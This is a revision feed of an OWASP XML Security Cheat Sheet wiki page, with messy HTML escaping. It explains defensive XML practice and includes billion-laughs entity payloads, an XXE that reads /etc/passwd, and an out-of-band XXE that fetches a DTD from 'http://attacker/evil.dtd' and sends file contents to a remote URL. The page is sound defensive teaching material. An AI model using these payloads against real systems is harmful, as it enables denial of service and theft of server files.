 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; expands to ten references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; each of these expands to ten references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. In the end, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, or 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
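&lt;br /&gt;
The growth is exponential in the number of nesting levels, which a short Python sketch makes explicit. The function name &amp;lt;tt&amp;gt;expanded_copies&amp;lt;/tt&amp;gt; is hypothetical. It assumes, as in the example above, that every level refers ten times to the level below it:&lt;br /&gt;

```python
def expanded_copies(levels, fanout=10):
    """Number of copies of the base string produced by the top-level entity."""
    return fanout ** levels


copies = expanded_copies(9)        # LOL9 sits nine levels above LOL
characters = copies * len("LOL")   # each copy contributes three characters

print(copies)      # 1000000000
print(characters)  # 3000000000
```

Each additional level multiplies the result by ten while adding only one short line to the DTD.&lt;br /&gt;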
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which resolves to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, for example a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what is going on by receiving the complete responses from the server being queried, so you have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports, depending on the schema and the underlying implementation. If a timeout occurs when trying to connect to a closed port (which may take one minute) while the response from an open port is very quick (one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
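&lt;br /&gt;
The averaging step described above can be sketched in Python as follows. The function name &amp;lt;tt&amp;gt;classify_ports&amp;lt;/tt&amp;gt;, the sample timings, and the threshold are all hypothetical. Whether the slower group corresponds to open or to closed ports depends on the implementation being tested, so the sketch only labels ports as fast or slow.&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port by comparing its mean response time with a threshold."""
    result = {}
    for port, timings in samples.items():
        result[port] = "slow" if mean(timings) > threshold_seconds else "fast"
    return result


# Made-up measurements in seconds, several per port to smooth out jitter.
measurements = {
    80: [0.11, 0.09, 0.12, 0.10],
    81: [0.31, 0.29, 0.35, 0.30],
}
print(classify_ports(measurements, threshold_seconds=0.2))
```

The more the network latency varies, the more samples per port are needed before the two groups separate reliably.&lt;br /&gt;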
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
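&lt;br /&gt;
On the defensive side, identifiers that carry credentials can be detected before they are resolved. The following Python sketch uses the standard &amp;lt;tt&amp;gt;urllib.parse.urlsplit&amp;lt;/tt&amp;gt; function. The helper name &amp;lt;tt&amp;gt;has_embedded_credentials&amp;lt;/tt&amp;gt; is hypothetical, and how an application gets hold of the system identifiers of a document depends on the parser in use.&lt;br /&gt;

```python
from urllib.parse import urlsplit


def has_embedded_credentials(system_identifier):
    """Return True when the URI carries a user name or a password."""
    parts = urlsplit(system_identifier)
    return parts.username is not None or parts.password is not None


print(has_embedded_credentials("foo://username:password@example.com:8080/"))  # True
print(has_embedded_credentials("http://example.com/note.dtd"))                # False
```

Rejecting such identifiers outright is usually safe, since legitimate schema locations rarely need credentials in the URI.&lt;br /&gt;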
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224433</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224433"/>
				<updated>2016-12-21T20:21:14Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
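&lt;br /&gt;
The comparison described above can be sketched in Python with the standard library parser. The helper names &amp;lt;tt&amp;gt;build_document&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;parse_seconds&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;item&amp;lt;/tt&amp;gt; element names are hypothetical. A real test would use the parser and the documents of the application under review and would repeat each measurement several times.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def build_document(items):
    """Serialize a root element that contains the given number of item children."""
    root = ET.Element("root")
    for i in range(items):
        ET.SubElement(root, "item").text = str(i)
    return ET.tostring(root)


def parse_seconds(document):
    """Return (elapsed seconds, well_formed) for a single parse attempt."""
    start = time.perf_counter()
    try:
        ET.fromstring(document)
        well_formed = True
    except ET.ParseError:
        well_formed = False
    return time.perf_counter() - start, well_formed


regular = build_document(10_000)
malformed = regular[:-7]  # drop the 7-byte closing tag of the root element

for label, document in (("regular", regular), ("malformed", malformed)):
    seconds, well_formed = parse_seconds(document)
    print(label, well_formed, round(seconds, 4))
```

If the malformed variant consistently takes noticeably longer than the regular one, the parser is a candidate for the asymmetric resource consumption attack described above.&lt;br /&gt;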
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may normalize the contents of your &lt;tt&gt;CDATA&lt;/tt&gt; sections. This means that they replace the special characters contained in the &lt;tt&gt;CDATA&lt;/tt&gt; section with the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
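&lt;br /&gt;
The integrity check mentioned above could be sketched in Python as follows. This is a minimal sketch, not a definitive implementation: it assumes the digest of the reviewed schema was recorded ahead of time, and the names &lt;tt&gt;schema_matches_digest&lt;/tt&gt;, &lt;tt&gt;trusted_schema&lt;/tt&gt;, and &lt;tt&gt;pinned_digest&lt;/tt&gt; are hypothetical.&lt;br /&gt;
&lt;br /&gt;
```python
import hashlib
import hmac


def schema_matches_digest(schema_bytes, expected_sha256_hex):
    """Return True if the schema bytes hash to the pinned SHA-256 digest."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking the position of the first mismatch.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


# Hypothetical local schema copy and the digest recorded when it was reviewed.
trusted_schema = b"placeholder schema contents"
pinned_digest = hashlib.sha256(trusted_schema).hexdigest()
```
&lt;br /&gt;
An application would run this check each time it loads the schema file and refuse to validate documents when the digest does not match.&lt;br /&gt;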
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &lt;tt&gt;id&lt;/tt&gt;, but now the document includes additional opening and closing tags. The attacker closes the &lt;tt&gt;id&lt;/tt&gt; element and sets a bogus &lt;tt&gt;price&lt;/tt&gt; element to the value 0. The final step to keep the structure well formed is to open one empty &lt;tt&gt;id&lt;/tt&gt; element. After this, the application adds the closing tag for &lt;tt&gt;id&lt;/tt&gt; and sets the &lt;tt&gt;price&lt;/tt&gt; to 10. If the application processes only the first values provided for the &lt;tt&gt;id&lt;/tt&gt; and the &lt;tt&gt;price&lt;/tt&gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
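&lt;br /&gt;
When no schema is available, an application can at least verify the shape of the message before reading any value. The following Python sketch assumes the message has already been parsed into an ElementTree element; &lt;tt&gt;has_expected_structure&lt;/tt&gt; and &lt;tt&gt;build_order&lt;/tt&gt; are hypothetical helpers, and the trees are built through the API rather than parsed from markup.&lt;br /&gt;
&lt;br /&gt;
```python
import xml.etree.ElementTree as ET

# The only child elements a buy message may contain, in order.
EXPECTED_CHILDREN = ["id", "price"]


def has_expected_structure(buy):
    """Return True only if buy has exactly the children id and price, in order."""
    return buy.tag == "buy" and [child.tag for child in buy] == EXPECTED_CHILDREN


def build_order(children):
    """Build a buy element from (tag, text) pairs without parsing any markup."""
    buy = ET.Element("buy")
    for tag, text in children:
        ET.SubElement(buy, tag).text = text
    return buy


legitimate = build_order([("id", "123"), ("price", "10")])
# Shape produced by the injected tags: id, price, id, price.
tampered = build_order([("id", "123"), ("price", "0"), ("id", ""), ("price", "10")])
```
&lt;br /&gt;
The check rejects the tampered message because it contains four children instead of two. It does not replace schema validation, since it says nothing about the values themselves.&lt;br /&gt;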
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &lt;tt&gt;person&lt;/tt&gt;. This element contains two elements in a specific order: &lt;tt&gt;name&lt;/tt&gt; and then &lt;tt&gt;age&lt;/tt&gt;. The element &lt;tt&gt;name&lt;/tt&gt; is then defined to contain &lt;tt&gt;PCDATA&lt;/tt&gt; as well as the element &lt;tt&gt;age&lt;/tt&gt;. After this definition begins the well-formed and valid XML document. The element &lt;tt&gt;name&lt;/tt&gt; contains an irrelevant value but the &lt;tt&gt;age&lt;/tt&gt; element contains one million digits. Since there are no restrictions on the maximum size for the &lt;tt&gt;age&lt;/tt&gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &lt;tt&gt;CipherValue&lt;/tt&gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &lt;tt&gt;CipherData&lt;/tt&gt; element). Restrictions were only partially enforced for the element, which means that the information was probably tested using an application instead of the proposed sample schema.&lt;br /&gt;
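&lt;br /&gt;
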